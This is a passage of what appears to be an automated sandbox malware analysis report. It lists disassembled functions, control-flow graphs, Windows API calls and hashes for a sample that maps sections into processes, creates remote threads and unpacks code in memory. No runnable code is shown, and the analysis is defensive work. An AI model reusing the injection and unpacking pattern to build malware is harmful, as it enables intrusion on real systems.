                                          • Instruction Fuzzy Hash: 5C527974A00229DFDB64CF58C984BA8BBB1BF09314F1481E9E50DAB391DB34AE94DF54
                                          Function 00741518 Relevance: 3.0, APIs: 2, Instructions: 41processCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 319 741518-741531 320 741533-741535 319->320 321 741537 320->321 322 74153c-741548 CreateToolhelp32Snapshot 320->322 321->322 323 741558-741565 Module32First 322->323 324 74154a-741550 322->324 325 741567-741568 call 7411d7 323->325 326 74156e-741576 323->326 324->323 329 741552-741556 324->329 330 74156d 325->330 329->320 329->323 330->326
                                          APIs
                                          • CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 00741540
                                          • Module32First.KERNEL32(00000000,00000224), ref: 00741560
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.2780779918.000000000072F000.00000040.00000020.00020000.00000000.sdmp, Offset: 0072F000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_72f000_teihrdr.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: CreateFirstModule32SnapshotToolhelp32
                                          • String ID:
                                          • API String ID: 3833638111-0
                                          • Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                          • Instruction ID: e92ca047c6852e13e11003d318d704e8dd8c0a899fad39ba178357769d0b7357
                                          • Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                          • Instruction Fuzzy Hash: 6AF0F6352003146BD7203BF9A88CBAEB6E8AF89324F500528F643920C0DB74EC854A60
                                          Function 00700E0F Relevance: 3.0, APIs: 2, Instructions: 15COMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 332 700e0f-700e24 SetErrorMode * 2 333 700e26 332->333 334 700e2b-700e2c 332->334 333->334
                                          APIs
                                          • SetErrorMode.KERNELBASE(00000400,?,?,00700223,?,?), ref: 00700E19
                                          • SetErrorMode.KERNELBASE(00000000,?,?,00700223,?,?), ref: 00700E1E
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.2780540702.0000000000700000.00000040.00001000.00020000.00000000.sdmp, Offset: 00700000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_700000_teihrdr.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: ErrorMode
                                          • String ID:
                                          • API String ID: 2340568224-0
                                          • Opcode ID: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                          • Instruction ID: 363d1c857498136fbe31aee574387ff28b79b8b4375f79cccd03c8d3e1615692
                                          • Opcode Fuzzy Hash: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                          • Instruction Fuzzy Hash: AED01231145128B7D7003A94DC09BCD7B5CDF05B62F008411FB0DE9080C774994046E5
                                          Function 004018E6 Relevance: 1.3, APIs: 1, Instructions: 63sleepCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 335 4018e6-40194b call 401193 Sleep call 40141f 349 40195a-4019a5 call 401193 335->349 350 40194d-401955 call 401514 335->350 350->349
                                          APIs
                                          • Sleep.KERNELBASE(00001388), ref: 00401936
                                            • Part of subcall function 00401514: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
                                            • Part of subcall function 00401514: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
                                            • Part of subcall function 00401514: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.2779673143.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_400000_teihrdr.jbxd
                                          Similarity
                                          • API ID: Section$CreateDuplicateObjectSleepView
                                          • String ID:
                                          • API String ID: 1885482327-0
                                          • Opcode ID: a4b5604c3fad4e3a9f3f792e8fb47035b06f8c3694b385928224ebe720cba1b7
                                          • Instruction ID: 08a90aa29aaa59261053d8f0d19a3ecdc4dd21bf61fce8c4d66a51d0c793aa75
                                          • Opcode Fuzzy Hash: a4b5604c3fad4e3a9f3f792e8fb47035b06f8c3694b385928224ebe720cba1b7
                                          • Instruction Fuzzy Hash: EB11A1F660C204FAEB106AA49C61E7A3318AB40754F304137F613790F5957D9A13F66F
                                          Function 00401915 Relevance: 1.3, APIs: 1, Instructions: 59sleepCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 364 401915-401918 365 4018c6-4018c7 364->365 366 40191a-40194b call 401193 Sleep call 40141f 364->366 367 4018d7 365->367 368 4018ce-4018e3 call 401193 365->368 378 40195a-4019a5 call 401193 366->378 379 40194d-401955 call 401514 366->379 367->368 379->378
                                          APIs
                                          • Sleep.KERNELBASE(00001388), ref: 00401936
                                            • Part of subcall function 00401514: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
                                            • Part of subcall function 00401514: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
                                            • Part of subcall function 00401514: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.2779673143.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_400000_teihrdr.jbxd
                                          Similarity
                                          • API ID: Section$CreateDuplicateObjectSleepView
                                          • String ID:
                                          • API String ID: 1885482327-0
                                          • Opcode ID: 7bb1df720b8f813faa3697c6259eeb6b3a5716e5c382bc39f4698e2c5426f3b5
                                          • Instruction ID: d2c64d108ecd7190b789ce3c9d4f03e3911909dfd4099b6475a4add21270c3a3
                                          • Opcode Fuzzy Hash: 7bb1df720b8f813faa3697c6259eeb6b3a5716e5c382bc39f4698e2c5426f3b5
                                          • Instruction Fuzzy Hash: 6D019EB7208208E6DB006AA5AC51ABA33189B44359F304537F723790F6D57D8612E72F
                                          Function 004018F1 Relevance: 1.3, APIs: 1, Instructions: 55sleepCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 393 4018f1-40194b call 401193 Sleep call 40141f 403 40195a-4019a5 call 401193 393->403 404 40194d-401955 call 401514 393->404 404->403
                                          APIs
                                          • Sleep.KERNELBASE(00001388), ref: 00401936
                                            • Part of subcall function 00401514: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
                                            • Part of subcall function 00401514: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
                                            • Part of subcall function 00401514: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.2779673143.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_400000_teihrdr.jbxd
                                          Similarity
                                          • API ID: Section$CreateDuplicateObjectSleepView
                                          • String ID:
                                          • API String ID: 1885482327-0
                                          • Opcode ID: db3408315eb658ba3491db04f2d46bddbd6b336d8c43cf969156009dde905ade
                                          • Instruction ID: b5ca90d31d4069b8fd1e735589466699ca1bb5e14181e618ca72d4e2f39bbf06
                                          • Opcode Fuzzy Hash: db3408315eb658ba3491db04f2d46bddbd6b336d8c43cf969156009dde905ade
                                          • Instruction Fuzzy Hash: D101D2B6608204EBDB019AF49C62A7A37549F44315F200137FA53790F1D67D8643E72F
                                          Function 00401912 Relevance: 1.3, APIs: 1, Instructions: 52sleepCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 418 401912-40194b call 401193 Sleep call 40141f 429 40195a-4019a5 call 401193 418->429 430 40194d-401955 call 401514 418->430 430->429
                                          APIs
                                          • Sleep.KERNELBASE(00001388), ref: 00401936
                                            • Part of subcall function 00401514: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
                                            • Part of subcall function 00401514: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
                                            • Part of subcall function 00401514: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.2779673143.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_400000_teihrdr.jbxd
                                          Similarity
                                          • API ID: Section$CreateDuplicateObjectSleepView
                                          • String ID:
                                          • API String ID: 1885482327-0
                                          • Opcode ID: 7e129187160df36b360d42079074bb08fe8934bb284168352239ee73acaefb28
                                          • Instruction ID: 0621b20c29367ada74e4c9127c9a5516285bec5e68af8f441e6b7f153e3f788d
                                          • Opcode Fuzzy Hash: 7e129187160df36b360d42079074bb08fe8934bb284168352239ee73acaefb28
                                          • Instruction Fuzzy Hash: 11017CB560C204EAEB109AA49C61A7A3318AB44354F304537FA27790F5D67D9612E72F
                                          Function 007411D7 Relevance: 1.3, APIs: 1, Instructions: 48memoryCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 444 7411d7-741211 call 7414ea 447 741213-741246 VirtualAlloc call 741264 444->447 448 74125f 444->448 450 74124b-74125d 447->450 448->448 450->448
                                          APIs
                                          • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040), ref: 00741228
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.2780779918.000000000072F000.00000040.00000020.00020000.00000000.sdmp, Offset: 0072F000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_72f000_teihrdr.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: AllocVirtual
                                          • String ID:
                                          • API String ID: 4275171209-0
                                          • Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                          • Instruction ID: 96c8ce7fdcfdcdf07e9d0d1261abbbd42b069f58392f8b3a3ac8505bab92dd24
                                          • Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                          • Instruction Fuzzy Hash: 80113C79A00208EFDB01DF98C985E98BBF5AF08750F158094FA489B362D375EA90DF80
                                          Function 00401925 Relevance: 1.3, APIs: 1, Instructions: 46sleepCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 451 401925-40194b call 401193 Sleep call 40141f 459 40195a-4019a5 call 401193 451->459 460 40194d-401955 call 401514 451->460 460->459
                                          APIs
                                          • Sleep.KERNELBASE(00001388), ref: 00401936
                                            • Part of subcall function 00401514: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
                                            • Part of subcall function 00401514: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
                                            • Part of subcall function 00401514: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.2779673143.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_400000_teihrdr.jbxd
                                          Similarity
                                          • API ID: Section$CreateDuplicateObjectSleepView
                                          • String ID:
                                          • API String ID: 1885482327-0
                                          • Opcode ID: 2f4c2daa00eb47e2555f44135ed694f04ab08e7709eb0f7e86441ab925b63f7c
                                          • Instruction ID: ea6e3854d66af35421fcd7571e0742f45a6e64d38424a4e1b6315f5079e28d0a
                                          • Opcode Fuzzy Hash: 2f4c2daa00eb47e2555f44135ed694f04ab08e7709eb0f7e86441ab925b63f7c
                                          • Instruction Fuzzy Hash: 28F08CB6208204EADB00AEA49C61EBA3318AB44314F304533FB23790F5C67D8612E72F

                                          Execution Graph

                                          Execution Coverage:6.2%
                                          Dynamic/Decrypted Code Coverage:42.5%
                                          Signature Coverage:0%
                                          Total number of Nodes:113
                                          Total number of Limit Nodes:4
                                          execution_graph 4214 403043 4215 40319a 4214->4215 4216 40306d 4214->4216 4216->4215 4217 403128 RtlCreateUserThread NtTerminateProcess 4216->4217 4217->4215 4299 4014cf 4300 4014d3 4299->4300 4301 401660 NtDuplicateObject 4300->4301 4310 401571 4300->4310 4302 40167d NtCreateSection 4301->4302 4301->4310 4303 4016a3 NtMapViewOfSection 4302->4303 4304 4016fd NtCreateSection 4302->4304 4303->4304 4306 4016c6 NtMapViewOfSection 4303->4306 4305 401729 4304->4305 4304->4310 4308 401733 NtMapViewOfSection 4305->4308 4305->4310 4306->4304 4307 4016e4 4306->4307 4307->4304 4309 40175a NtMapViewOfSection 4308->4309 4308->4310 4309->4310 4273 520001 4274 520005 4273->4274 4279 52092b GetPEB 4274->4279 4276 520030 4281 52003c 4276->4281 4280 520972 4279->4280 4280->4276 4282 520049 4281->4282 4283 520e0f 2 API calls 4282->4283 4284 520223 4283->4284 4285 520d90 GetPEB 4284->4285 4286 520238 VirtualAlloc 4285->4286 4287 520265 4286->4287 4288 5202ce VirtualProtect 4287->4288 4290 52030b 4288->4290 4289 520439 VirtualFree 4293 5204be LoadLibraryA 4289->4293 4290->4289 4292 5208c7 4293->4292 4400 4015d5 4401 4015e4 4400->4401 4402 401660 NtDuplicateObject 4401->4402 4411 40177c 4401->4411 4403 40167d NtCreateSection 4402->4403 4402->4411 4404 4016a3 NtMapViewOfSection 4403->4404 4405 4016fd NtCreateSection 4403->4405 4404->4405 4407 4016c6 NtMapViewOfSection 4404->4407 4406 401729 4405->4406 4405->4411 4409 401733 NtMapViewOfSection 4406->4409 4406->4411 4407->4405 4408 4016e4 4407->4408 4408->4405 4410 40175a NtMapViewOfSection 4409->4410 4409->4411 4410->4411 4233 402f16 4234 402f1a 4233->4234 4236 402fa2 4234->4236 4237 401991 4234->4237 4238 4019a0 4237->4238 4239 4019d8 Sleep 4238->4239 4241 4019f3 4239->4241 4242 4014c4 4239->4242 4241->4236 4243 4014d3 4242->4243 4244 401660 NtDuplicateObject 4243->4244 4253 401571 4243->4253 4245 40167d NtCreateSection 4244->4245 4244->4253 4246 4016a3 NtMapViewOfSection 4245->4246 4247 4016fd NtCreateSection 4245->4247 4246->4247 4249 4016c6 NtMapViewOfSection 4246->4249 4248 401729 4247->4248 4247->4253 4251 401733 NtMapViewOfSection 4248->4251 4248->4253 4249->4247 4250 4016e4 4249->4250 4250->4247 4252 40175a NtMapViewOfSection 4251->4252 4251->4253 4252->4253 4253->4241 4294 520005 4295 52092b GetPEB 4294->4295 4296 520030 4295->4296 4297 52003c 7 API calls 4296->4297 4298 520038 4297->4298 4371 402e9a 4372 402e5f 4371->4372 4373 402eaf 4371->4373 4374 402fa2 4373->4374 4375 401991 8 API calls 4373->4375 4375->4374 4323 402ee7 4324 402ef9 4323->4324 4325 402fa2 4324->4325 4326 401991 8 API calls 4324->4326 4326->4325 4448 4019a9 4449 4019a0 4448->4449 4450 4019d8 Sleep 4449->4450 4451 4014c4 7 API calls 4450->4451 4452 4019f3 4450->4452 4451->4452 4254 52003c 4255 520049 4254->4255 4267 520e0f SetErrorMode SetErrorMode 4255->4267 4260 520265 4261 5202ce VirtualProtect 4260->4261 4263 52030b 4261->4263 4262 520439 VirtualFree 4266 5204be LoadLibraryA 4262->4266 4263->4262 4265 5208c7 4266->4265 4268 520223 4267->4268 4269 520d90 4268->4269 4270 520dad 4269->4270 4271 520dbb GetPEB 4270->4271 4272 520238 VirtualAlloc 4270->4272 4271->4272 4272->4260 4218 58ebad 4219 58ebbc 4218->4219 4222 58f34d 4219->4222 4223 58f368 4222->4223 4224 58f371 CreateToolhelp32Snapshot 4223->4224 4225 58f38d Module32First 4223->4225 4224->4223 4224->4225 4226 58f39c 4225->4226 4227 58ebc5 4225->4227 4229 58f00c 4226->4229 4230 58f037 4229->4230 4231 58f048 VirtualAlloc 4230->4231 4232 58f080 4230->4232 4231->4232 4232->4232 4376 401975 4377 401979 4376->4377 4378 4014c4 7 API calls 4377->4378 4379 4019f3 4378->4379

                                          Executed Functions

                                          Function 004014C4 Relevance: 10.8, APIs: 7, Instructions: 277COMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 85 4014c4-4014f6 91 4014f9-40150d call 401240 85->91 96 401512-401513 91->96 97 401544-401545 96->97 98 401515-401528 96->98 100 401547 97->100 101 4015bd-4015d4 97->101 98->91 99 40152a-401535 98->99 99->96 105 401537-401543 99->105 102 401596-4015a6 100->102 103 401549-40154b 100->103 106 4015a8 102->106 103->106 107 40154d-40156d 103->107 105->97 109 4015e7-40160a call 401240 107->109 110 40156f 107->110 119 40160c 109->119 120 40160f-401614 109->120 112 401571 110->112 113 4015e2-4015e3 110->113 113->109 119->120 122 40161a-40162b 120->122 123 40193e-401946 120->123 126 401631-40165a 122->126 127 40193c 122->127 123->120 128 40194b-40198e call 401240 123->128 126->127 136 401660-401677 NtDuplicateObject 126->136 127->128 136->127 138 40167d-4016a1 NtCreateSection 136->138 140 4016a3-4016c4 NtMapViewOfSection 138->140 141 4016fd-401723 NtCreateSection 138->141 140->141 144 4016c6-4016e2 NtMapViewOfSection 140->144 141->127 142 401729-40172d 141->142 142->127 146 401733-401754 NtMapViewOfSection 142->146 144->141 145 4016e4-4016fa 144->145 145->141 146->127 148 40175a-401776 NtMapViewOfSection 146->148 148->127 152 40177c 148->152 152->127 153 40177c call 401781 152->153 153->127
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.2881906138.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_400000_jtihrdr.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 2c516529a2ac13b86f5a9833a34ba141477503330a6309f7cab00fb21d89e914
                                          • Instruction ID: a2440897234d9063cbd2a71cb92c382042c3cd10596cdc4f18a7c269882a1901
                                          • Opcode Fuzzy Hash: 2c516529a2ac13b86f5a9833a34ba141477503330a6309f7cab00fb21d89e914
                                          • Instruction Fuzzy Hash: 0981D5B4504244FBDB208F95CC49FEB7BB8EF81740F20416BF902BA1E5D6749902DB66
                                          Function 004015D5 Relevance: 10.7, APIs: 7, Instructions: 166nativeCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 154 4015d5-4015e4 156 4015f4 154->156 157 4015eb-4015f0 154->157 156->157 158 4015f7-40160a call 401240 156->158 157->158 161 40160c 158->161 162 40160f-401614 158->162 161->162 164 40161a-40162b 162->164 165 40193e-401946 162->165 168 401631-40165a 164->168 169 40193c 164->169 165->162 170 40194b-40198e call 401240 165->170 168->169 178 401660-401677 NtDuplicateObject 168->178 169->170 178->169 180 40167d-4016a1 NtCreateSection 178->180 182 4016a3-4016c4 NtMapViewOfSection 180->182 183 4016fd-401723 NtCreateSection 180->183 182->183 186 4016c6-4016e2 NtMapViewOfSection 182->186 183->169 184 401729-40172d 183->184 184->169 188 401733-401754 NtMapViewOfSection 184->188 186->183 187 4016e4-4016fa 186->187 187->183 188->169 190 40175a-401776 NtMapViewOfSection 188->190 190->169 194 40177c 190->194 194->169 195 40177c call 401781 194->195 195->169
                                          APIs
                                          • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 0040166F
                                          • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 0040169C
                                          • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 004016BF
                                          • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 004016DD
                                          • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 0040171E
                                          • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 0040174F
                                          • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 00401771
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.2881906138.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_400000_jtihrdr.jbxd
                                          Similarity
                                          • API ID: Section$View$Create$DuplicateObject
                                          • String ID:
                                          • API String ID: 1546783058-0
                                          • Opcode ID: 7ee060c25f7402fbb52614a213f4e0533528eb01ea0636b15e5313f781570415
                                          • Instruction ID: 5b275a0397ac31cab10c66c3112b8ecfdbc4447489e22d1c2cba3eb21d005058
                                          • Opcode Fuzzy Hash: 7ee060c25f7402fbb52614a213f4e0533528eb01ea0636b15e5313f781570415
                                          • Instruction Fuzzy Hash: 8251F9B5900245BBEB208F91CC48FEF7BB8EF85710F10416AFA11BA2A5D7759941CB64
                                          Function 004015DF Relevance: 10.7, APIs: 7, Instructions: 164nativeCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 196 4015df-4015e4 198 4015f4 196->198 199 4015eb-4015f0 196->199 198->199 200 4015f7-40160a call 401240 198->200 199->200 203 40160c 200->203 204 40160f-401614 200->204 203->204 206 40161a-40162b 204->206 207 40193e-401946 204->207 210 401631-40165a 206->210 211 40193c 206->211 207->204 212 40194b-40198e call 401240 207->212 210->211 220 401660-401677 NtDuplicateObject 210->220 211->212 220->211 222 40167d-4016a1 NtCreateSection 220->222 224 4016a3-4016c4 NtMapViewOfSection 222->224 225 4016fd-401723 NtCreateSection 222->225 224->225 228 4016c6-4016e2 NtMapViewOfSection 224->228 225->211 226 401729-40172d 225->226 226->211 230 401733-401754 NtMapViewOfSection 226->230 228->225 229 4016e4-4016fa 228->229 229->225 230->211 232 40175a-401776 NtMapViewOfSection 230->232 232->211 236 40177c 232->236 236->211 237 40177c call 401781 236->237 237->211
                                          APIs
                                          • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 0040166F
                                          • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 0040169C
                                          • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 004016BF
                                          • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 004016DD
                                          • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 0040171E
                                          • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 0040174F
                                          • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 00401771
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.2881906138.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_400000_jtihrdr.jbxd
                                          Similarity
                                          • API ID: Section$View$Create$DuplicateObject
                                          • String ID:
                                          • API String ID: 1546783058-0
                                          • Opcode ID: ece60b1a1f6b7668ef9dd9651a4bb7dd92a40417c9a174c89548745d0f41eda4
                                          • Instruction ID: aa7ad941c6157971e71dc2736092b98b642c15495c2c07021be349f0f8194e9f
                                          • Opcode Fuzzy Hash: ece60b1a1f6b7668ef9dd9651a4bb7dd92a40417c9a174c89548745d0f41eda4
                                          • Instruction Fuzzy Hash: 4D51FAB5900249BBEB208F91CC48FEF7BB8EF85710F10015AFA11BA2A5D7749945CB64
                                          Function 004015F2 Relevance: 10.7, APIs: 7, Instructions: 164nativeCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 238 4015f2-4015f4 240 4015f7-40160a call 401240 238->240 241 4015eb-4015f0 238->241 244 40160c 240->244 245 40160f-401614 240->245 241->240 244->245 247 40161a-40162b 245->247 248 40193e-401946 245->248 251 401631-40165a 247->251 252 40193c 247->252 248->245 253 40194b-40198e call 401240 248->253 251->252 261 401660-401677 NtDuplicateObject 251->261 252->253 261->252 263 40167d-4016a1 NtCreateSection 261->263 265 4016a3-4016c4 NtMapViewOfSection 263->265 266 4016fd-401723 NtCreateSection 263->266 265->266 269 4016c6-4016e2 NtMapViewOfSection 265->269 266->252 267 401729-40172d 266->267 267->252 271 401733-401754 NtMapViewOfSection 267->271 269->266 270 4016e4-4016fa 269->270 270->266 271->252 273 40175a-401776 NtMapViewOfSection 271->273 273->252 277 40177c 273->277 277->252 278 40177c call 401781 277->278 278->252
                                          APIs
                                          • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 0040166F
                                          • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 0040169C
                                          • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 004016BF
                                          • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 004016DD
                                          • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 0040171E
                                          • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 0040174F
                                          • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 00401771
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.2881906138.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_400000_jtihrdr.jbxd
                                          Similarity
                                          • API ID: Section$View$Create$DuplicateObject
                                          • String ID:
                                          • API String ID: 1546783058-0
                                          • Opcode ID: 5004b19ac8624500f5096878767cb1f7e044049cfcd571ee7eaf3f6ae6e17c7c
                                          • Instruction ID: 51677960ee3875d5e78d4b2c0b9a124aae989836c1cf5ff6a0c78d9f2f0b6c9a
                                          • Opcode Fuzzy Hash: 5004b19ac8624500f5096878767cb1f7e044049cfcd571ee7eaf3f6ae6e17c7c
                                          • Instruction Fuzzy Hash: 8E51FAB5900249BBEB208F91CC48FAFBBB8EF85710F10415AF911BA2A5D7759941CB64
                                          Function 004015E6 Relevance: 10.7, APIs: 7, Instructions: 163nativeCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 279 4015e6-40160a call 401240 284 40160c 279->284 285 40160f-401614 279->285 284->285 287 40161a-40162b 285->287 288 40193e-401946 285->288 291 401631-40165a 287->291 292 40193c 287->292 288->285 293 40194b-40198e call 401240 288->293 291->292 301 401660-401677 NtDuplicateObject 291->301 292->293 301->292 303 40167d-4016a1 NtCreateSection 301->303 305 4016a3-4016c4 NtMapViewOfSection 303->305 306 4016fd-401723 NtCreateSection 303->306 305->306 309 4016c6-4016e2 NtMapViewOfSection 305->309 306->292 307 401729-40172d 306->307 307->292 311 401733-401754 NtMapViewOfSection 307->311 309->306 310 4016e4-4016fa 309->310 310->306 311->292 313 40175a-401776 NtMapViewOfSection 311->313 313->292 317 40177c 313->317 317->292 318 40177c call 401781 317->318 318->292
                                          APIs
                                          • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 0040166F
                                          • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 0040169C
                                          • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 004016BF
                                          • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 004016DD
                                          • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 0040171E
                                          • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 0040174F
                                          • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 00401771
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.2881906138.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_400000_jtihrdr.jbxd
                                          Similarity
                                          • API ID: Section$View$Create$DuplicateObject
                                          • String ID:
                                          • API String ID: 1546783058-0
                                          • Opcode ID: f3e491e8a03b641489fc3b5b9cce92a4ae92d047acba71485eea125912a2ab07
                                          • Instruction ID: 771dbcf6e2504e630b0d67c3c545d31db11f89db77175d6a648901ef483dfe93
